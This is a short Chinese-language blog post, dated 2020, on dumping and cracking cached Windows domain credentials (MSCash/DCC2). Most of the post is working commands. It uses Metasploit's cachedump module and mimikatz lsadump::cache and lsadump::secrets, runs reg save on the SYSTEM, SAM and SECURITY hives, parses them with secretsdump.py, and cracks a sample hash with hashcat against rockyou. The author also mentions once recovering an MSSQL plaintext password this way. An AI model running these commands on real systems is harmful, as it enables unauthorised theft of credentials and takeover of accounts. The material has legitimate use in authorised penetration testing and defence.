另类的缓存凭证收集

Mscash is a Microsoft hashing algorithm that is used for storing cached domain credentials locally on a system after a successful logon. 
It's worth noting that cached credentials do not expire. 
Domain credentials are cached on a local system so that domain members can logon to the machine even if the DC is down. 
It's worth noting that mscash hash is not passable - i.e PTH attacks will not work.

实质缓存存储的位置:HKEY_LOCAL_MACHINE\SECURITY\Cache

缓存凭证的获取方式

meterpreter post/windows/gather/cachedump模块

meterpreter中dump的数据需要经过过滤echo ; cat hashes.txt ; echo ; cut -d ":" -f 2 hashes.txt

mimikatz中的lsadump::cache

可以发现上面两种方式只能获取到用户的,而通过其他的方式解析该注册表还能获取第三方服务的一些密码信息,之前在有次环境中就解析到了mssql的明文!

reg save HKLM\SYSTEM system & reg save HKLM\security security
lsadump::secrets /system:c:\programdata\system /security:c:\programdata\security

或者:

reg save HKLM\SYSTEM sys.hiv 
reg save HKLM\SAM sam.hiv 
reg save hklm\security security.hiv 
python secretsdump.py -sam sam.hiv -security security.hiv -system sys.hiv LOCAL

爆破哈希

数据格式:$DCC2$10240#username#hash

该数据不是明文,所以还需要经过爆破来得出密码

hashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable

参考文章:https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials

posted @ 2020-12-11 02:02  zpchcbd  阅读(91)  评论(0编辑  收藏  举报